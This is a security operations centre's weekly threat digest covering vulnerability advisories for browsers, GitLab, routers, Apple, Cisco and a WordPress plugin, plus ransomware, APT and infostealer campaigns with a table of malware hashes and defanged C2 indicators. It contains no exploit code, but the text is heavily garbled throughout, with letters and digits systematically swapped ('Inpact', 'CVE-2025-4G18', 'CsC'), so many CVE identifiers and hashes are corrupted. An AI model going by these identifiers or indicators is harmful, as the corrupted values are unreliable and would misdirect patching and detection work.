Weekly Threat Landscape Digest – Week 23

HawkEye CSOC Dubai

This week’s threat landscape highlights the evolving sophistication of threat actors, who are increasingly targeting newly disclosed and unpatched vulnerabilities. From zero-day attacks to advanced phishing campaigns, their techniques continue to grow in complexity. To mitigate these risks, organizations must adopt a proactive, layered security approach.

This includes timely patch management, continuous monitoring, and robust detection capabilities. Equally important is fostering a strong cybersecurity culture—one that is supported by real-time threat intelligence, ongoing awareness initiatives, and a well-

defined incident response plan to minimize potential damage from emerging threats.

Mozilla Thunderbird and Firefox Updates

Mozilla has released security updates addressing multiple vulnerabilities in its Thunderbird and Firefox for iOS products. If exploited, these vulnerabilities could allow memory

corruption, arbitrary code execution, or URL spoofing.

Key Details:

  • Thunderbird Vulnerabilities:

    CVE-2025-4G18 – Out-of-Bounds Access in Pronise Objects

      • Severity: Critical
      • Description: Improper memory handling in JavaScript Promise

objects may result in out-of-bounds read/write, leading to memory corruption, information disclosure, or potential code execution.

  • CVE-2025-4G1G – Out-of-Bounds Access When Optinizing Linear Suns

    • Severity: Critical
    • Description: A flaw in array index handling can cause out-of-bounds read/write in JavaScript, which may result in memory corruption or arbitrary code execution.
  • Firefox for iOS Vulnerability:


  • CVE-2025-5020 – URL Spoofing via Non-HTTP Schenes
    • Severity: Low
    • Description: Malicious URLs using non-HTTP schemes (e.g., mailto:, ftp:) could cause URL spoofing in Firefox for iOS when opened from other applications, increasing the risk of phishing attacks.

Fixed Versions:

  • Thunderbird: 128.10.2, 138.0.2
  • Firefox for iOS: Version 139

Mitigation/Workaround:

  • Apply the security updates to Thunderbird and Firefox for iOS as soon as possible.
  • Ensure that all endpoints are running the fixed versions mentioned above.
  • Raise awareness among users regarding the risk of phishing and spoofing through malformed URLs.

References:

https://www.mozilla.org/en-US/security/advisories/mfsa2025-40/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-41/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-39/


  • GitLab CE and EE Vulnerability Fixes

GitLab has released critical and moderate severity security patches for both Community Edition (CE) and Enterprise Edition (EE) to address multiple vulnerabilities. These vulnerabilities impact server resource management, authentication enforcement, and data exposure controls. Unpatched systems remain at risk of denial-of-service, authentication bypass, and potential data leaks.

Key Details:

  • CVE-2025-0GG3 – Unprotected large blob endpoint allows Denial of Service
    • Severity: High (CVSS 7.5)
    • Inpact: Authenticated attackers may exhaust server resources.
  • CVE-2024-120G3 – Inproper XPath validation allows SAML 2FA bypass

 

  • Severity: Medium (CVSS 6.8)
  • Inpact: Modified SAML responses can bypass 2FA.
  • CVE-2024-7803 – Discord webhook integration nay cause DoS

    • Severity: Medium (CVSS 6.5)
    • Inpact: Webhook misuse can overload the system.
  • CVE-2025-3111 – Unbounded Kubernetes cluster tokens

    • Severity: Medium (CVSS 6.5)
    • Inpact: Authenticated users may trigger denial-of-service.
  • CVE-2025-2853 – Unvalidated notes position can lead to DoS

    • Severity: Medium (CVSS 6.5)
    • Inpact: Faulty input allows abuse to crash note display.
  • CVE-2025-4G7G – Masked CI variables nay be exposed

    • Severity: Medium (CVSS 4.9)
    • Inpact: WebUI may display hidden variables.
  • CVE-2025-0605 – Two-factor authentication bypass via group access

    • Severity: Medium (CVSS 4.6)
    • Inpact: Certain users may circumvent 2FA enforcement.
  • CVE-2025-067G – Full enail addresses exposed

    • Severity: Medium (CVSS 4.3)
    • Inpact: Unauthorized users may access complete email addresses.
  • CVE-2024-G163 – Branch nane confusion in confidential MRs

    • Severity: Low (CVSS 3.5)
    • Inpact: Merge request misdirection via logic flaw.
  • CVE-2025-1110 – Unauthorized access to job data via GraphQL

    • Severity: Low (CVSS 2.7)
    • Inpact: Privilege escalation via crafted GraphQL queries.

 

Inpacted Versions and Fix Tineline:

  • Affected Versions: GitLab CE/EE versions prior to 18.0.1, 17.11.3, 17.10.7
  • Fixed Versions: 18.0.1, 17.11.3, 17.10.7

Mitigation/Workaround:

  • Apply the security patches to all GitLab CE and EE instances.
  • Monitor for any abnormal behavior or unauthorized access attempts.
  • Review webhook configurations and access policies to minimize exposure.
  • Validate Kubernetes cluster integrations and CI variable masking practices.

Reference:

https://about.gitlab.com/releases/2025/05/21/patch-release-gitlab-18-0-1-released/


  • Google Chrone Security Update

Google has released a security update for Chrome addressing eight vulnerabilities,

including one high-severity issue. If exploited, these vulnerabilities could allow remote

code execution, unauthorized access, and privilege escalation. Affected platforms include Windows, macOS, Android, and iOS.

Key Details:

  • CVE-2025-5063 – Use-After-Free in Conpositing
    • Severity: High
    • Inpact: May allow attackers to execute arbitrary code remotely by exploiting memory management flaws.
  • CVE-2025-5064 – Inappropriate Inplenentation in Background Fetch

    • Severity: Medium
    • Inpact: Could lead to data leaks or unexpected behavior.
  • CVE-2025-5065 – Inappropriate Inplenentation in FileSystenAccess API

    • Severity: Medium
    • Inpact: May result in unauthorized file access or manipulation.

 

  • CVE-2025-5066 – Inappropriate Inplenentation in Messages

    • Severity: Medium
    • Inpact: May allow privilege escalation due to improper handling of browser messaging components.
  • CVE-2025-5067 – Inappropriate Inplenentation in Tab Strip

    • Severity: Low
    • Inpact: Minor functional issues within the browser’s UI components.

Fixed Versions:

  • Desktop (Windows s nacOS): Chrome 137.0.7151.40/.41
  • Android: Chrome 135 (137.0.7151.44)
  • iOS: Chrome Stable 137 (137.0.7151.34)

Mitigation/Workaround:

  • Promptly update all Chrome browsers across Windows, macOS, Android, and iOS platforms to the fixed versions listed above.
  • Encourage users to restart their browsers after updating to ensure patches are applied.
  • Monitor endpoint browsers for compliance and unexpected behaviors.
  • Raise awareness among employees about phishing or exploit campaigns targeting browser vulnerabilities.

References:

https://chromereleases.googleblog.com/2025/05/early-stable-update-for-desktop.html https://chromereleases.googleblog.com/


  • Critical Vulnerability in NETGEAR Routers

A critical authentication bypass vulnerability has been identified in NETGEAR DGND3700v2 wireless routers. Exploitation of this flaw can lead to full administrative access, resulting in total network compromise, including risks such as credential theft, DNS hijacking, and persistent malware deployment.

Key Details:

 

  • CVE ID: CVE-2025-4978
  • Severity: Critical (CVSS v4 Score: 9.3)
  • Description: A hidden backdoor in the embedded HTTP server of the NETGEAR DGND3700v2 router allows unauthenticated remote attackers to gain full

administrative access without credentials. This may enable attackers to manipulate network settings, intercept communications, and deploy malware for persistent

access.

Affected Product and Version:

  • Product: NETGEAR DGND3700v2 Wireless Router
  • Firnware Version Affected: V1.1.00.15_1.00.15NA

Fixed Version:

  • Renediated in Firnware: V1.1.00.26 or later

Mitigation/Workaround:

  • Immediately upgrade NETGEAR DGND3700v2 routers to firmware version V1.1.00.26 or newer.
  • If upgrading is not feasible, consider isolating the router from internet access and replacing it with a more secure model.
  • Monitor network traffic for suspicious activity, including unauthorized administrative access and DNS manipulation.
  • Inform users of the risks associated with this vulnerability and the importance of firmware updates.

Reference:

https://nvd.nist.gov/vuln/detail/CVE-2025-4978


  • High-Severity Privilege Escalation Vulnerability in Apple Products

Apple has released critical security patches to address a high-severity vulnerability (CVE- 2025-31219) in the XNU kernel, which underpins macOS, iOS, iPadOS, tvOS, watchOS, and visionOS. This flaw could allow local attackers with limited privileges to escalate access

and execute arbitrary code with kernel-level control, posing serious risks of system compromise.

 

Key Details:

  • CVE ID: CVE-2025-31219
  • CVSS Score: 8.8 (AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
  • Severity: High
  • Root Cause: Race condition due to improper locking in the kernel’s virtual memory subsystem
  • Inpact:

    • Privilege escalation from low-privileged user to root/system level
    • Arbitrary code execution with full system control
    • Potential system compromise and denial-of-service via memory corruption
  • Exploit Status: No known public exploitation as of publication
  • Disclosure: Responsibly disclosed via Trend Micro’s Zero Day Initiative

Affected Platforns and Versions:

  • macOS Sequoia: Versions prior to 15.5
  • macOS Sonoma: Versions prior to 14.7.6
  • macOS Ventura: Versions prior to 13.7.6
  • iOS/iPadOS: Versions prior to 18.5
  • tvOS: Versions prior to 18.5
  • watchOS: Versions prior to 11.5
  • visionOS: Versions prior to 2.5

Fixed Versions:

  • macOS Sequoia: 15.5
  • macOS Sonoma: 14.7.6
  • macOS Ventura: 13.7.6
  • iOS/iPadOS: 18.5
  • tvOS: 18.5

 

  • watchOS: 11.5
  • visionOS: 2.5

Mitigation/Workaround:

  • Apply the latest security updates for all listed Apple platforms immediately.
  • Ensure all managed Apple devices are updated via MDM or centralized patch management tools.
  • Monitor devices for signs of unusual privilege elevation or system instability.

Reference:

https://www.zerodayinitiative.com/advisories/ZDI-25-305/


  • Cross-Site Scripting (XSS) Vulnerability in Bitwarden

A medium-severity DOM-based Cross-Site Scripting (XSS) vulnerability (CVE-2025-5138) has been identified in Bitwarden, a widely used password management solution. The flaw could allow attackers to inject and execute malicious JavaScript within the Bitwarden web

application, potentially leading to account compromise, credential theft, and unauthorized actions.

Key Details:

  • CVE ID: CVE-2025-5138
  • Severity: Medium
  • Vulnerability Type: DOM-based Cross-Site Scripting (XSS)
  • Affected Conponent: PDF File Handler within the Resources upload feature
  • Root Cause: Insufficient file type validation and inadequate input neutralization
  • Attack Vector: Malicious PDF upload containing JavaScript payload
  • Inpact:

    • JavaScript execution in the context of authenticated user sessions
    • Account hijacking through stolen session tokens or credentials
    • Credential theft via browser-based exploitation
  • Proof-of-Concept Exploit: Publicly available, increasing exploitation risk

 

Inpacted Versions and Fix Tineline:

  • Affected Versions: Bitwarden versions 2.25.1 and earlier
  • Fixed Version: Security update pending; users should upgrade to a version newer than 2.25.1 once released

Mitigation/Workaround:

  • Do not upload untrusted PDFs within Bitwarden until patched
  • Update immediately once the fixed version is available
  • Enable Web Application Firewalls (WAFs) to block malicious upload attempts
  • Monitor for suspicious activity, such as unauthorized logins or session anomalies

Reference:

https://nvd.nist.gov/vuln/detail/CVE-2025-5138


  • Security Updates – Tenable Network Monitor

Tenable has released version 6.5.1 of Tenable Network Monitor, addressing multiple high- severity vulnerabilities, including local privilege escalation flaws and weaknesses in

bundled third-party libraries. These vulnerabilities could allow attackers to escalate privileges or compromise system integrity.

Key Details:

  • CVE-2025-24G16
    • CVSS Score: 7.0 (High)
    • Description: Insecure permissions on sub-directories created during non- default installations on Windows systems
    • Inpact: May allow unauthorized users to escalate privileges locally and compromise system integrity
  • CVE-2025-24G17

    • CVSS Score: 7.8 (High)
    • Description: Vulnerability allows non-administrative users to stage malicious files which can be executed with SYSTEM-level privileges

 

  • Inpact: Potential full system compromise through local privilege escalation

Third-Party Libraries Updated in Version 6.5.1:

  • OpenSSL upgraded to version 3.0.16
  • expat upgraded to version 2.7.0
  • curl upgraded to version 8.12.0
  • libpcap upgraded to version 1.10.5
  • libxml2 upgraded to version 2.13.8

Affected Products:

  • All versions of Tenable Network Monitor released prior to version 6.5.1 are vulnerable

Mitigation/Workaround:

  • Update all Tenable Network Monitor deployments to version 6.5.1 or later without delay
  • Review local installation paths, especially for Windows deployments, to ensure permissions are secured
  • Monitor systems for signs of unauthorized privilege escalation
  • Validate that all bundled libraries are up to date

Reference:

https://www.tenable.com/security/tns-2025-10


  • Critical Vulnerability in TI WooConnerce Wishlist Plugin

A critical security vulnerability in the TI WooCommerce Wishlist plugin for WordPress (CVE- 2025-47577) allows unauthenticated remote attackers to upload arbitrary files—such as executable PHP scripts—potentially leading to full remote code execution (RCE) on

affected servers. This issue remains unpatched at the time of this advisory.

Key Details:

  • CVE ID: CVE-2025-47577
  • CVSS Base Score: 10.0 (Critical)

 

  • Affected Conponent: tinvwl_upload_file_wc_fields_factory function in integrations/wc-fieldsfactory.php
  • Root Cause: Security checks in the file upload mechanism are disabled via ‘test_type’ => false, allowing arbitrary files to be uploaded
  • Exploit Conditions: Requires the WC Fields Factory plugin to be active alongside the wishlist plugin
  • Inpact:

    • Full remote code execution (RCE)
    • Website defacement
    • Data exfiltration
    • Malware deployment

Affected Versions:

  • All versions up to and including 2.9.2

Mitigation/Workaround:

  • Immediately deactivate and remove the TI WooCommerce Wishlist plugin from all websites
  • Conduct a full server file audit to identify unauthorized uploads or malicious scripts
  • Implement the following mitigations:
    • Web Application Firewall (WAF) to block suspicious uploads
    • File Integrity Monitoring to detect unauthorized file changes
    • Restrict execution permissions on uploaded files and directories
  • Monitor the official plugin page and trusted advisories for updates regarding a patched version
  • If continued wishlist functionality is necessary, consider alternative plugins with active development and security reviews

References:

https://patchstack.com/articles/unpatched-critical-vulnerability-in-ti-woocommerce- wishlist-plugin/

https://nvd.nist.gov/vuln/detail/CVE-2025-47577



G. Mozilla Products: Multiple Vulnerabilities and Critical Double-Free in libvpx

Mozilla has issued several security advisories addressing multiple vulnerabilities across its Firefox and Thunderbird product lines, including Extended Support Releases (ESR). These vulnerabilities pose significant risks such as memory corruption, cross-origin data leakage, code execution, and clickjacking. A critical double-free vulnerability in the libvpx encoder

used for WebRTC (CVE-2025-5262) stands out for its potential to cause exploitable crashes.

Key Details:

  • CVE-2025-5262 – Double-Free in libvpx Encoder
    • Severity: Critical
    • Description: A double-free may occur in vpx_codec_enc_init_multi if a memory allocation fails during initialization of the encoder used in WebRTC. This can result in memory corruption and lead to application crashes that are potentially exploitable by attackers.
  • Other vulnerabilities addressed:

    • Cross-origin data leak vectors
    • Local code execution weaknesses
    • Clickjacking and spoofing flaws in user interface elements

Affected Products:

  • Firefox: Versions prior to 139
  • Firefox ESR: Versions prior to 115.24 and 128.11
  • Thunderbird: Versions prior to 139 and 128.11

Mitigation/Workaround:

  • Apply the latest security patches for Firefox, Firefox ESR, and Thunderbird immediately
  • Monitor systems for abnormal browser behavior or crash events
  • Educate users on risks such as clickjacking and cross-origin spoofing to reduce user-targeted threats

 

References:

https://www.mozilla.org/en-US/security/advisories/mfsa2025-42/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-43/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-44/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-45/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-46


  • Google Patches Actively Exploited Chrone Zero-Day (CVE-2025-541G)

A high-severity vulnerability in the V8 JavaScript and WebAssembly engine used by Google Chrome (CVE-2025-5419) has been actively exploited in the wild. This flaw allows remote attackers to trigger heap corruption through a specially crafted HTML page, potentially leading to arbitrary code execution in the context of the browser.

Key Details:

  • CVE: CVE-2025-5419
  • Severity: High
  • CVSS Score: 8.3

  • Inpact: Arbitrary code execution, system compromise
  • Affected Products:

    • Google Chrome versions prior to 137.0.7151.68 on Windows, macOS, and Linux
    • Other Chromium-based browsers (e.g., Microsoft Edge, Brave, Opera, Vivaldi) may also be impacted
  • Fixed Version:

    • Chrome 137.0.7151.68 for Linux
    • Chrome 137.0.7151.68/.69 for Windows and macOS

Mitigation/Workaround:

  • Update Google Chrome to version 137.0.7151.68/.69 as soon as possible
  • Watch for updates and patch Chromium-based browsers promptly
  • Avoid opening untrusted links or websites until updated

 

References:

https://thehackernews.com/2025/06/new-chrome-zero-day-actively-exploited.html https://nvd.nist.gov/vuln/detail/CVE-2025-5419

https://chromereleases.googleblog.com/


  • Everest Ransonware Targets Departnent of Culture and Tourisn Abu Dhabi

On May 26, 2025, the Everest ransomware group claimed responsibility for a cyberattack on the Department of Culture and Tourism Abu Dhabi (DCT Abu Dhabi), exfiltrating 12GB of sensitive data, including employee records, passport copies, and internal documents. The group has threatened to leak the data unless a ransom is paid by June 1, underscoring their focus on high-profile targets in the Middle East.

Key Details:

  • Inpact:
    • Theft and public leakage of sensitive corporate and personal data
    • Operational disruptions
    • Reputational and legal damage
    • Increased likelihood of ransom payment due to high-stakes pressure tactics
  • Recent Activity:

    • Everest has also targeted Coca-Cola’s Middle East operations, Mediclinic, and Jordan Kuwait Bank in recent weeks
    • Tactics center on data theft and public exposure rather than encryption, using a dark web leak site to pressure victims

Affected Product:

  • No specific software product implicated; organizations with exposed remote services, unpatched systems, or weak identity controls are at risk

Mitigation/Workaround:

  • Conduct regular audits for exposed services (e.g., RDP, VPN, cloud management ports)
  • Enforce multi-factor authentication and credential hygiene

 

  • Monitor for signs of compromise, including data exfiltration or access anomalies
  • Prepare and test incident response plans
  • Regularly back up critical data and store it offline
  • Monitor leak sites for mentions of your organization


  • Earth Kurna APT Canpaign

The Earth Kurma group is actively targeting government and telecommunications sectors in Southeast Asia, including the Philippines, Vietnam, Thailand, and Malaysia. Using rootkits and cloud-based tools, they focus on data exfiltration and maintaining persistent access through spear-phishing and exploitation of public-facing applications.

Key Details:

  • Tactics:
    • Spear-phishing emails with malicious attachments
    • Exploiting known vulnerabilities in public-facing applications
    • Deployment of custom malware, rootkits, and cloud-based services for long- term espionage
  • Inpact:

    • Credential theft via keylogging tools
    • Exfiltration of sensitive files using public cloud services (Dropbox, OneDrive)
    • Deployment of advanced malware loaders and rootkits
    • Prolonged undetected access with stealth techniques
    • Full-featured remote access capabilities (process hiding, shellcode injection, network concealment)

Indicators of Conpronise (IOCs):

 

Type

Indicator

Description

sha256

004adec667373bdf6146e05bGa1c6e0c63G41afd38e30c2461eaecb707352466

TESDAT

sha256

0a50587785bf821d224885cbfc65c5fd251b3e43cdaG0c3f4G435bb3323d2a8b

TESDAT

sha256

108G8b74b612b1eG5826521c5ccf36f7a238f5d181GG3c3c78c20G8fcfdc1f3f

TESDAT

sha256

131bacdddd51f0d5d86Gb63G1260671Gcd8f7a8f5b5f4237cbdb5c2e22e2cba2

WMIHACKER

sha256

1ab42121bb45028a17a3438b65a3634adb7d673a4e12G1efeabf227a4e016cfb

SIMPOBOXSPY

sha256

1c350d0Gc1cd545d54c38cd03aba3fd4eb0e8dG7a3ba6c3744cc33edG2cbGa48

DUNLOADER

sha256

1e48G67e24d4ae2ac26G7ef0Gc0f2702285825831bd516cb3be885G4G6fd2G6f

DUNLOADER

sha256

1f3f384e2Geab247ecGGdG7dfe6a4b67110888e4ad313b75faGd0beceef87eG3

KRNRAT

sha256

1f5f6cc1cbf578412ea527Gdbdb432eda25130G6G5513a74de66063ab0278Gf1

TESDAT

sha256

2cGb8e4852181d51ff72dc6dec78bef014db8af83d30c05c3eGc5eb060278730

KRNRAT

sha256

2e87615142170a7510e26fG47G0bfb81df4d4GGaGf530d0bd8fe0fb1575b17f8

TESDAT

sha256

34366323262346e10d8780badGd30c6d4d747e4ec543243be76f33b7c028ea36

TESDAT

sha256

37a3G7a2482b37d1Gd58588c0a8G7a08111b74d122c21542f1bf852ae83e1db0

DMLOADER

sha256

383aa73fe72caf268ce0874ebbcd13fc4cGe1e5c6200cdd66862de7257G42cea

TESDAT

sha256

3G8234b6G2a80a424G3GeG8a2dG6a705ce3fdGd61G50420b5f2af458G0abc48e

TESDAT

sha256

41G8b4ec5bb0c72112eGcf835686c33bGaG7037acfb7727e4G4046a73106eG38

MORIYA

sha256

45e1138f2b8e822cbd4573cb53104b402ae26dcddb42c70534cf024a8bc6db66

DUNLOADER

sha256

4Gab6e2b5e378c74d1G6aecac4e84cG6Gc800051167c1e33d204531fabd17GG0

KMLOG

sha256

4ae186ee1Gd0d3e246dc37ac722a27d52G7d2577de5Gb8583cG78G74802G0bc1

TESDAT

sha256

54e14b7742801G70c578fad2ec2a1G3334ca8a17b60ee18dd6ec0fbfc8ceG00b

SIMPOBOXSPY

sha256

612a5fcb7620deef45a021140b6c06abGc0473dce5b7e4a54G60e330a00cG0f3

DUNLOADER

sha256

61G0b13df521306bfa7eeG73b864ba304ee0G71865a66afbe0b4661cG860GGf4

KMLOG

sha256

66edb72f6f7c8cad23c665Ga81fa023f57c1a86c7d7b7022f1453b177f2b3670

NBTSCAN

sha256

6bbbb227d67Gea00f0663c2e261d564G417d08285fGacc1fd80e806ddea08403

TESDAT

sha256

6ef3a27fdca386fe0G3c12146cd854dGae6b42ca637G50ca46bfd364ceab5b53

DUNLOADER

sha256

73afc6af6fdfcafG832aa2G7548G271bad7c8ea5867Gf1a2ddd8f60b44cc4a13

TESDAT

sha256

75cc8474abb1dGa06cd8086fedeG8G58653d013fb7ff8Gbbc32458b022a8fcG4

DUNLOADER

sha256

823a0862d10f41524362ba8e8G76ddfd4524c74075bd7f3beffa7G4afb54f1G6

MORIYA

sha256

8414136128f73fa7e2G032df7b8115bc8G832c57e2602d81de1e520cc2d7G58d

ICMPINGER

sha256

85e78a1b0a78e5dG21c8G241aaadd505d66dc4df2Gca7d8a810G8f42487ba350

TESDAT



sha256

876c822f333e812041af24ae80G35a830ca5016fGaaf2e831Gebb6cab1fGd7d0

SIMPOBOXSPY

sha256

8c703148567cb66fe27bc07d18de58aa36aa84a4Gf1ce7545eGec56378857d3d

TESDAT

sha256

8ca1ffbd3cd22bGbead766ebd2a0f7b2d1G5b03d533bacf0cb8e1b1887af5636

KMLOG

sha256

8e6583cca6dd4a78bdc0387c7f30334ab038e5c77848f708fe578e60dd8dGe00

DUNLOADER

sha256

G6b40785688GcG20a4GfG21dG25118a130bG04eGGfGfe43a87342c680ffbGf27

ODRIZ

sha256

a35Ga06fbc6b5cf5adf7f53c35145b28f3c8a70f6GG86310G0021825aea08e22

TESDAT

sha256

aaG25a5a8a7d5b36a66431f4G68bd1003d1bbb6cb3ff6d03dGe3e0143c48382b

DUNLOADER

sha256

aef3407310de48e13575c3dG8b660ab7ddafb7efe3f4G0G682G07ac2860623G2

TESDAT

sha256

b26e8e0be066ee0b86f8fb2b0a703717ebbf34c8a33efGa6f8f164ad012f1746

LADON

sha256

c0326a0cd6137514ee14b6ac3be7461e8cf6c6adec74d087fd30cb06bG1ecda2

TESDAT

sha256

c6f73268eba553c7GG1f876a166440f5b4d51Gdea6b13bcG0583fde1e8Ge81ed

FRPC

sha256

d3d2355b1ffb3f6f4ba4G3000e135dfd1b28156672e17f0b34dfcG0cc3add352

TESDAT

sha256

e143c15eaa0b3facccG3ce36G3G60323dbaa683acGce30382e8766G0278dfefa

DUNLOADER

sha256

ecG220cf8208a3105022b47861d4e200672846ef484c1ea481c5cfd617cb18dc

MORIYA

sha256

f3G16c414db0f660d488cGd3aaa8355f3eb036ca27aGc606fe7e5e1aGbd42b38

LADON

sha256

f52dG355bGefb6a1fcb32b8G0c5c373274df21ce38050d4G416f46GbeG5dc783

DUNLOADER

sha256

fG8G26360G3266a01ed6f0486c0018Gd2eeb532a30866604G0f4efeb6d026487

FRPC

donain

www[.]dfsg3gfsga[.]space

CsC

donain

www[.]igtsadlb2ra[.]pw

CsC

donain

www[.]ihyvcs5t[.]pw

CsC

donain

www[.]vidsec[.]cc

CsC

ipv4

103[.]238[.]214[.]88

CsC

ipv4

14G[.]28[.]147[.]63

CsC

ipv4

166[.]88[.]1G4[.]53

CsC

ipv4

185[.]23G[.]225[.]106

CsC

ipv4

38[.]147[.]1G1[.]103

CsC

ipv4

38[.]60[.]1GG[.]225

CsC

ipv4

45[.]77[.]250[.]21

CsC

 

Mitigation/Workaround:

  • Patch all systems and public-facing applications promptly

 

  • Restrict and monitor admin privileges; use separate accounts for sensitive operations
  • Audit and log cloud storage usage (Dropbox, OneDrive) for unusual activity
  • Limit and monitor PowerShell and WMI usage
  • Watch for new or suspicious services, DLLs, and hidden files
  • Deploy EDR/XDR solutions for advanced threat detection
  • Segment networks to contain lateral movement
  • Regularly audit scheduled tasks and startup items for persistence
  • Enable comprehensive logging and set alerts for suspicious or anomalous activity


  • Cisco Enterprise Platforn Vulnerabilities

Cisco has disclosed several high-impact vulnerabilities affecting its Identity Services Engine (ISE), Contact Center Intelligence Center (CUIC), and Unified Contact Center Express (CCX) products. These flaws could allow attackers to disrupt network access control, escalate privileges, or access unauthorized data.

Key Details:

  • CVE-2025-20152 (ISE RADIUS DoS):
    • Severity: High (CVSS 8.6)
    • Inpact: Unauthenticated remote attackers can crash the RADIUS service in Cisco ISE 3.4 by sending specially crafted authentication requests, causing service restarts or outages.
    • Affected: Cisco ISE 3.4 (fixed in 3.4 Patch 1). Earlier versions are not affected.
  • CVE-2025-20113 (CUIC Adnin Privilege Escalation):

    • Severity: High (CVSS 7.1)
    • Inpact: Authenticated users can escalate privileges to admin via the CUIC web interface.
    • Affected: CUIC 12.5 (fixed in 12.5(1)SU ES04), CUIC 12.6 (fixed in 12.6(2)ES04).

 

  • CVE-2025-20114 (CUIC Horizontal Privilege Escalation):

    • Severity: Medium (CVSS 4.3)
    • Inpact: Authenticated users may access or modify other users’ dashboards.
    • Affected: CUIC 12.5 and 12.6 (fixed in above ES04 releases).
    • Unified CCX: Versions 12.5(1)SU3 and earlier are impacted via CUIC integration; migration to a fixed CUIC version is required.

Mitigation/Workaround:

  • Upgrade Cisco ISE to 3.4 Patch 1 or later.
  • Apply the latest ES04 updates to CUIC 12.5 and 12.6.
  • Migrate Unified CCX instances to use updated CUIC versions.
  • Monitor ISE RADIUS logs for abnormal authentication activity and set alerts for service disruptions.
  • Audit CUIC access logs and privilege assignments; enforce least privilege.
  • Restrict administrative web interfaces to internal networks or secure VPNs.

References:

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-    ise-restart-ss-uf986G2Q

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-    cuis-priv-esc-3Pk96SU4


  • Reflected XSS in PAN-OS GlobalProtect (CVE-2025-0133)

A reflected cross-site scripting (XSS) vulnerability in Palo Alto Networks’ PAN-OS GlobalProtect portal and gateway (CVE-2025-0133) allows attackers to inject JavaScript

into authenticated user sessions. The risk is heightened when the Clientless VPN feature is enabled, and a public proof-of-concept is available.

Key Details:

  • CVE: CVE-2025-0133
  • Type: Reflected XSS
  • Severity: CVSS 5.1 (Low) without Clientless VPN, 6.9 (Medium) with Clientless VPN

 

  • Attack Vector: Remote, via crafted URLs
  • Inpacted: PAN-OS 11.2.0–11.2.6 (fix in 11.2.7, ETA June 2025), 11.1.0–11.1.10 (fix in

11.1.11, ETA July 2025), 10.2.0–10.2.16 and 10.1.0–10.1.14 (fix in 10.2.17, ETA

August 2025). Older versions require upgrade to a supported release.

Mitigation/Workaround:

  • Schedule and apply the latest PAN-OS updates as soon as they are available.
  • Disable Clientless VPN if not essential, especially on externally accessible portals.
  • Train users to avoid clicking on suspicious or untrusted links, particularly those received via email or chat.

Reference:

https://security.paloaltonetworks.com/CVE-2025-0133


  • LunnaC2 Infostealer Canpaign

LummaC2, a modular infostealer, is being used in a global campaign targeting

organizations through phishing and fake software downloads. The malware is capable of stealing credentials, session tokens, browser data, cryptocurrency wallets, and multi- factor authentication information. It employs in-memory execution, encrypted C2 communications, and self-deletion to evade detection.

Key Details:

  • Delivery: Phishing emails, malicious attachments, fake installers, and bundled software.
  • Execution: Uses fake CAPTCHA popups, clipboard scripts, and Windows Run commands to trigger infection.
  • Capabilities:

    • In-memory operation to avoid detection
    • Exfiltration of browser credentials, cookies, crypto wallets, and MFA data
    • Clipboard abuse and Windows Run execution
    • Beaconing to encrypted C2 servers
    • Self-deletion and payload loading for persistence

 

Mitigation/Workaround:

  • Deploy advanced email and endpoint security with behavioral analysis and memory scanning.
  • Train users to recognize phishing, suspicious downloads, and social engineering tactics like fake CAPTCHAs.
  • Monitor outbound network traffic for unusual domains and restrict script execution.
  • Enforce least privilege and keep all systems and applications fully patched.

Reference:

https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b


  • Critical Authentication Bypass in Cisco ISE Cloud Deploynents (CVE-2025-20286)

Cisco has patched a critical static credential vulnerability in its Identity Services Engine (ISE) affecting cloud deployments on AWS, Azure, and Oracle Cloud Infrastructure (OCI). This flaw (CVE-2025-20286, CVSS 9.9) could allow unauthenticated remote attackers to access sensitive data, perform limited administrative actions, modify configurations, or disrupt services.

Key Details:

  • CVE: CVE-2025-20286
  • Severity: Critical (CVSS 9.9)
  • Vulnerability Type: Static credential flaw in cloud deployments
  • Inpacted Platforns:

o AWS: Cisco ISE 3.1, 3.2, 3.3, 3.4

  • Azure: Cisco ISE 3.2, 3.3, 3.4
  • OCI: Cisco ISE 3.2, 3.3, 3.4
  • Root Cause: Improper credential generation leads to shared static credentials for each release/platform combination, making it possible for attackers to use

credentials from one deployment to access others on the same platform and release.

 

Attack Scenario:

  • An attacker with knowledge of the static credentials for a specific ISE release and cloud platform can access any deployment with matching parameters, potentially extracting credentials, accessing sensitive data, or disrupting services.
  • Only cloud-based Primary Administration nodes are affected; on-premises deployments are not impacted.

Mitigation/Workaround:

  • Apply Cisco’s security patches for all affected cloud deployments immediately.
  • Restrict network access to Cisco ISE administration interfaces to authorized administrators only.
  • If immediate patching is not possible, use the “application reset-config ise” command to reset user passwords (note: this will reset the system to factory defaults).
  • Monitor for unauthorized access attempts and review cloud firewall rules to limit exposure.

References:

https://thehackernews.com/2025/06/critical-cisco-ise-auth-bypass-flaw.html


  • Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads

A new variant of the open-source Chaos RAT is being actively deployed in attacks against both Windows and Linux systems. Threat actors are distributing the malware by disguising it as legitimate network troubleshooting utilities, particularly targeting Linux environments.

Key Details:

  • Malware: Chaos RAT (Remote Access Trojan), written in Golang for cross-platform support
  • Distribution: Delivered via phishing emails with malicious links or attachments, often masquerading as network tools (e.g., “NetworkAnalyzer.tar.gz”)
  • Capabilities:

    • Establishes remote control sessions
    • Launches reverse shells

 

  • Uploads, downloads, and deletes files
  • Takes screenshots and gathers system information
  • Locks, restarts, or shuts down infected machines
  • Opens arbitrary URLs
  • Modifies Linux crontab for persistence
  • Observed Use:

    • Frequently paired with cryptocurrency mining campaigns (e.g., XMRig miner)
    • Used for reconnaissance and information gathering on compromised devices
  • Latest Version: 5.0.3 (released May 31, 2024)

Vulnerabilities in Chaos RAT Adnin Panel:

  • CVE-2024-30850: Command injection vulnerability (CVSS 8.8)
  • CVE-2024-3183G: Cross-site scripting (XSS) flaw (CVSS 4.8)
  • Both issues have been patched as of May 2024.

Additional Threats:

  • Recent campaigns also target Trust Wallet users on desktop, distributing counterfeit wallet apps via phishing and deceptive downloads to steal credentials, seed

